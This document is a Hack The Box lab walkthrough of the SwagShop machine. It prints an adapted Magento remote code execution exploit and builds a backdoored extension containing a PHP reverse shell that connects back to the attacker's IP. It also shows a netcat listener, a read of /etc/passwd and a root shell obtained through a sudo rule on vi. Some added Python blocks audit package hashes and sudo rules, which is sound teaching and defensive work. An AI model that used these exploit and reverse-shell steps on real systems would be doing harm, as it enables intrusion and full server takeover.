This post documents the complete walkthrough of SwagShop, an active vulnerable VM created by ch4p and hosted at Hack The Box.

Description

SwagShop is a retired GNU/Linux eCommerce web server using an outdated/unpatched version of Magento with known vulnerabilities and exploits. The Linux system allows the Apache user to run a sudo command with no password required, allowing privilege escalation to root.
❯ Information Gathering
Starting with an Nmap scan:

```console
➜ nmap -sV -sC -oA namp 10.10.10.140
...
└> PORT   STATE SERVICE VERSION
   22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
   80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
   |_http-server-header: Apache/2.4.18 (Ubuntu)
   |_http-title: Home page
   Service Info: OS: Linux;
```
From the SSH version banner we guess this box is Ubuntu Xenial, and Nmap finds 80/tcp open.
❯ Web Pages Enumeration
Going to http://10.10.10.140 in the browser, we find a Magento shop with some HTB swag available. The pages carry a 2014 copyright notice, and a check of Magento's release history shows that the last version released in 2014 was 1.9.x.
Browsing around, you will notice that the items are placed under a folder called index.php/ (http://10.10.10.140/index.php/). By running two GoBuster scans, one on http://10.10.10.140/ and one on http://10.10.10.140/index.php/, we find the admin panel at http://10.10.10.140/index.php/admin/ and http://10.10.10.140/downloader/, which gives access to Magento Connect Manager. Through it you can upload new Magento packages, which contain PHP files.
❯ Exploitation
We use searchsploit to find exploits for Magento 1.9.x and notice a remote code execution exploit:

| Exploit Title                              | Path (/usr/share/exploitdb/)  |
|--------------------------------------------|-------------------------------|
| Magento eCommerce - Remote Code Execution  | exploits/xml/webapps/37977.py |
We need to tweak the exploit a little for this box's odd $IP/index.php/admin path instead of the $IP/admin path the script expects:

```python
...
target = "http://10.10.10.140/"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

# the admin controller lives under /index.php/admin on this box
target_url = target + "/index.php" + "/admin/Cms_Wysiwyg/directive/index/"
...
```
We run the script:

```console
➜ python 37977.py
└> WORKED
   Check http://10.10.10.140/admin with creds forme:forme
```
Now we can log in to the admin panel at http://10.10.10.140/index.php/admin and to http://10.10.10.140/downloader with the credentials forme:forme.
❯ Getting a Reverse Shell
Using the Magento Downloader (Magento Connect), we attempt to upload an extension containing a PHP reverse shell. Download any legitimate Magento package; we’ll use LavaMagentoBD from GitHub/P34C3-07/LavaMagentoBD, extract lavamagento_bd.tgz, and modify its contents.
```console
➜ tar -xzvf lavalamp_magento_bd.tgz
```
Edit the file ./App/code/community/Lavalamp/Connector/controllers/IndexController.php and replace its contents with a PHP reverse shell; we’ll use php-reverse-shell from GitHub/pentestmonkey/php-reverse-shell. Make sure to change the $ip field to your IP address; we will use port 1234:

```php
$ip = '10.10.14.115';  // CHANGE THIS
$port = 1234;
```
Get the MD5 hash of the file:

```console
➜ md5sum ./App/code/community/Lavalamp/Connector/controllers/IndexController.php
└> 7587816c42712b0c9fe6dccb2c6c5300  IndexController.php
```
Copy it, then edit package.xml and replace the hash of IndexController.php:

```xml
<dir name="controllers">
    <file hash="7587816c42712b0c9fe6dccb2c6c5300"
          name="IndexController.php"/>
</dir>
```
Compress the files back into a .tgz file:

```console
➜ tar -cvzf lavalamp_magento_bd.tgz -c ./*
```
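To make the hash step concrete, here is an added example (not part of the walkthrough or the LavaMagentoBD project) that parses a package.xml the way the Connect Manager's per-file MD5 check is assumed to work and reports which listed files match, differ or are missing. The target-to-directory mapping, the package.xml and the file tree are constructed for the example.

```python
import hashlib
import xml.etree.ElementTree as ET

# Magento Connect target names and the install directories they map to
# (assumed mapping; add magelocal, magedesign, etc. as needed).
TARGET_DIRS = {"magecommunity": "app/code/community",
               "magelocal": "app/code/local"}

# Constructed package.xml mirroring the <dir>/<file> layout edited above.
# The hash is md5("abc"), the digest of the constructed controller below.
PACKAGE_XML = """<package>
  <name>Lavalamp_Connector</name>
  <contents>
    <target name="magecommunity">
      <dir name="Lavalamp"><dir name="Connector"><dir name="controllers">
        <file hash="900150983cd24fb0d6963f7d28e17f72"
              name="IndexController.php"/>
      </dir></dir></dir>
    </target>
  </contents>
</package>"""

CONTROLLER = "app/code/community/Lavalamp/Connector/controllers/IndexController.php"
GOOD_TREE = {CONTROLLER: b"abc"}   # constructed stand-in for the extracted .tgz


def listed_files(package_xml):
    """Yield (install_path, declared_md5) for every <file> in package.xml."""
    root = ET.fromstring(package_xml)
    for target in root.iter("target"):
        base = TARGET_DIRS.get(target.get("name"), target.get("name"))
        yield from _walk(target, base)


def _walk(node, prefix):
    for child in node:
        if child.tag == "dir":
            name = child.get("name")
            yield from _walk(child, prefix if name == "." else f"{prefix}/{name}")
        elif child.tag == "file":
            yield f"{prefix}/{child.get('name')}", child.get("hash")


def verify_package(package_xml, tree):
    """Return {path: 'ok' | 'mismatch' | 'missing'} for the files package.xml lists."""
    report = {}
    for path, declared in listed_files(package_xml):
        data = tree.get(path)
        if data is None:
            report[path] = "missing"
        else:
            report[path] = "ok" if hashlib.md5(data).hexdigest() == declared else "mismatch"
    return report
```

The check is integrity only, not authenticity: any package whose hashes line up is accepted regardless of what its PHP does, which is why an exposed /downloader with weak admin credentials is the real weakness here.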
Then upload the file to http://10.10.10.140/downloader/, logging in with the credentials forme:forme. If the extension is loaded successfully, you should see:
Start listening using netcat:

```console
➜ nc -v -n -l -p 1234
```
Then, in the browser, navigate to http://10.10.10.140/app/code/community/Lavalamp/Connector/controllers/IndexController.php. In the terminal you should see that we got a reverse shell:

```console
➜ nc -nvlp 1234
└> listening on [any] 1234 ...
   connect to [<IP>] from (UNKNOWN) [10.10.10.140] 44650
   Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP x86_64 GNU/Linux
    13:22:28 up 32 min,  0 users,  load average: 4.31, 2.61, 1.86
   USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
   uid=33(www-data) gid=33(www-data) groups=33(www-data)
   /bin/sh: 0: can't access tty; job control turned off
```
We are connected now as the user www-data, but we still need to spawn a bash shell with a tty:

```console
$ python -c 'import pty; pty.spawn("/bin/bash")'
```
❯ Own User
Now that we have a shell on the box we can view /etc/passwd:

```console
➜ www-data@swagshop:/$ cat /etc/passwd
└> root:x:0:0:root:/root:/bin/bash
   daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
   bin:x:2:2:bin:/bin:/usr/sbin/nologin
   sys:x:3:3:sys:/dev:/usr/sbin/nologin
   sync:x:4:65534:sync:/bin:/bin/sync
   games:x:5:60:games:/usr/games:/usr/sbin/nologin
   man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
   lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
   mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
   news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
   uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
   proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
   www-data:x:33:33:www-data:/var/www:/bin/bash
   backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
   list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
   irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:...
   nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
   systemd-timesync:x:100:102:systemd Time Synchronization,,,:...
   systemd-network:x:101:103:systemd Network Management,,,:...
   systemd-resolve:x:102:104:systemd Resolver,,,:...
   systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/...
   syslog:x:104:108::/home/syslog:/bin/false
   _apt:x:105:65534::/nonexistent:/bin/false
   lxd:x:106:65534::/var/lib/lxd/:/bin/false
   mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
   messagebus:x:108:112::/var/run/dbus:/bin/false
   uuidd:x:109:113::/run/uuidd:/bin/false
   dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
   sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
   haris:x:1000:1000:haris,,,:/home/haris:/bin/bash
```
We notice the user haris:

```console
➜ www-data@swagshop:/$ ls -alh /home/haris
└> total 36K
   drwxr-xr-x 3 haris haris 4.0K May  8 09:21 .
   drwxr-xr-x 3 root  root  4.0K May  2 14:48 ..
   -rw------- 1 haris haris   54 May  2 14:56 .Xauthority
   lrwxrwxrwx 1 root  root     9 May  8 09:20 .bash_history -> /dev/null
   -rw-r--r-- 1 haris haris  220 May  2 14:48 .bash_logout
   -rw-r--r-- 1 haris haris 3.7K May  2 14:48 .bashrc
   drwx------ 2 haris haris 4.0K May  2 14:49 .cache
   -rw------- 1 root  root     1 May  8 09:20 .mysql_history
   -rw-r--r-- 1 haris haris  655 May  2 14:48 .profile
   -rw-r--r-- 1 haris haris    0 May  2 14:49 .sudo_as_admin_successful
   -rw-r--r-- 1 haris haris   33 May  8 09:01 user.txt
```
We find user.txt:

```console
➜ www-data@swagshop:/$ cat /home/haris/user.txt
└> <user flag>
```
❯ Privilege Escalation: Own Root
Enumerating the system, sudo -l lists the user’s privileges and shows that www-data may run vi on the path /var/www/html/* as root, with no password required:

```console
➜ www-data@swagshop:/$ sudo -l
└> Matching Defaults entries for www-data on swagshop:
       env_reset, mail_badpass,
       secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

   User www-data may run the following commands on swagshop:
       (root) NOPASSWD: /usr/bin/vi /var/www/html/*
```
Open a file using vi in /var/www/html/*:

```console
➜ www-data@swagshop:/$ sudo /usr/bin/vi /var/www/html/Bad3r.sh
└> Vim: Warning: Output is not to a terminal
   Vim: Warning: Input is not from a terminal

   E558: Terminal entry not found in terminfo
   'unknown' not known. Available builtin terminals are:
       builtin_amiga
       builtin_beos-ansi
       builtin_ansi
       builtin_pcansi
       builtin_win32
       builtin_vt320
       builtin_vt52
       builtin_xterm
       builtin_iris-ansi
       builtin_debug
       builtin_dumb
   defaulting to 'ansi'
```
Inside vi you can spawn a root shell:

```console
:!/bin/bash
~
~
```
In the interactive shell, we can get the root flag:

```console
➜ whoami
└> root
➜ cat /root/root.txt
└> <root flag>
      ___ ___
    /| |/|\| |\
   /_| ´ |.` |_\           We are open! (Almost)
     |   | .  |
     | --- | --- | --------------------------------- |
     |   | .   |  Join the beta HTB Swag Store!     |
     | ___ | .__ |  https://hackthebox.store/password |

   PS: Use root flag as password!
```
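A defender-side check for exactly this kind of rule, added here and not part of the original walkthrough: it parses the rule lines of `sudo -l` output and flags NOPASSWD rules, wildcard arguments (sudo matches the argument list as one concatenated string, so a wildcard can match more than intended) and programs such as vi that can hand the caller a shell. The sample output is constructed from the listing above and the shell-capable program list is an assumption to extend as needed.

```python
import re
from posixpath import basename

# Programs that give the caller a shell even when sudo pins their arguments
# (vi/vim via ":!cmd", less via "!cmd", etc.). Assumed list; extend as needed.
SHELL_CAPABLE = {"vi", "vim", "view", "less", "more", "man", "find", "awk",
                 "perl", "python", "python3", "sh", "bash"}

# Matches a rule line such as "    (root) NOPASSWD: /usr/bin/vi /var/www/html/*"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

# Constructed sample mirroring the sudo -l output on this box.
SAMPLE = r"""Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
"""


def parse_rules(sudo_l_output):
    """Turn the rule lines of `sudo -l` output into (runas, tags, argv) tuples."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t for t in re.split(r":\s*", m.group("tags")) if t}
        rules.append((m.group("runas").strip(), tags, m.group("cmd").split()))
    return rules


def audit_rules(rules):
    """Return (runas, command, [issues]) for every rule worth a second look."""
    findings = []
    for runas, tags, argv in rules:
        prog = basename(argv[0])
        issues = []
        if "NOPASSWD" in tags:
            issues.append("no password required")
        if argv == ["ALL"]:
            issues.append("unrestricted command")
        if prog in SHELL_CAPABLE:
            issues.append(f"{prog} can spawn a shell")
        if any(ch in arg for arg in argv[1:] for ch in "*?["):
            issues.append("wildcard argument (matched as one concatenated string)")
        if issues:
            findings.append((runas, " ".join(argv), issues))
    return findings
```

Run the output of `sudo -l` for each service account through `audit_rules(parse_rules(...))`; a rule combining a shell-capable editor, a wildcard and NOPASSWD, as on this box, is the one to rewrite so the web user gets no sudo access at all.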